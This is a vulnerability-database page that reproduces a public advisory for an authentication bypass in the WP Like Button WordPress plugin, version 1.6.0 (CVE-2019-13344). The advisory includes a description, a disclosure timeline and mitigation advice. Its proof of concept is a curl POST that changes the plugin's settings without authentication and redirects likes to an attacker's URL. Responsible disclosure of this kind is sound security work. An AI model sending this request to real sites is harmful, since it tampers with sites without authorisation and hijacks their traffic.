Vulners
Lucene search
WordPress Plugin Like Button 1.6.0 - Authentication Bypass
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | WordPress Like Button 1.6.0 Plugin - Authentication Bypass Vulnerability | 8 Jul 201900:00 | – | zdt |
 | CVE-2019-13344 | 5 Jul 201918:59 | – | circl |
 | WordPress CRUDLab WP Like Button Plugin Authentication Vulnerability | 9 Jul 201900:00 | – | cnvd |
 | Wordpress Like Button Plugin Authentication Bypass (CVE-2019-13344) | 14 Nov 202200:00 | – | checkpoint_advisories |
 | CVE-2019-13344 | 5 Jul 201915:33 | – | cve |
 | CVE-2019-13344 | 5 Jul 201915:33 | – | cvelist |
 | WordPress Plugin Like Button 1.6.0 - Authentication Bypass | 8 Jul 201900:00 | – | exploitpack |
 | CVE-2019-13344 | 5 Jul 201916:15 | – | nvd |
 | WordPress Like Button 1.6.0 Authentication Bypass | 8 Jul 201900:00 | – | packetstorm |
 | WordPress WP Like Button plugin <= 1.6.0 - Auth Bypass vulnerability | 10 Jul 201900:00 | – | patchstack |
10
Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344
1. Product & Service Introduction:
WP Like button allows you to add Facebook like button on your wordpress
blog. You can also add Share button along with Like button or can add
recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.
2. Technical Details & Description:
Authentication Bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php did not check if
the current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the settings of the plugin.
3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com. This allows the attacker to
hijack Facebook likes.
curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"
4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.
5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 ([email protected])
2019/06/30 Second email sent to vendor ([email protected])
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain ([email protected])
2018/07/05 Public disclosure
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2019 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 25
CVSS 35.3
EPSS0.58059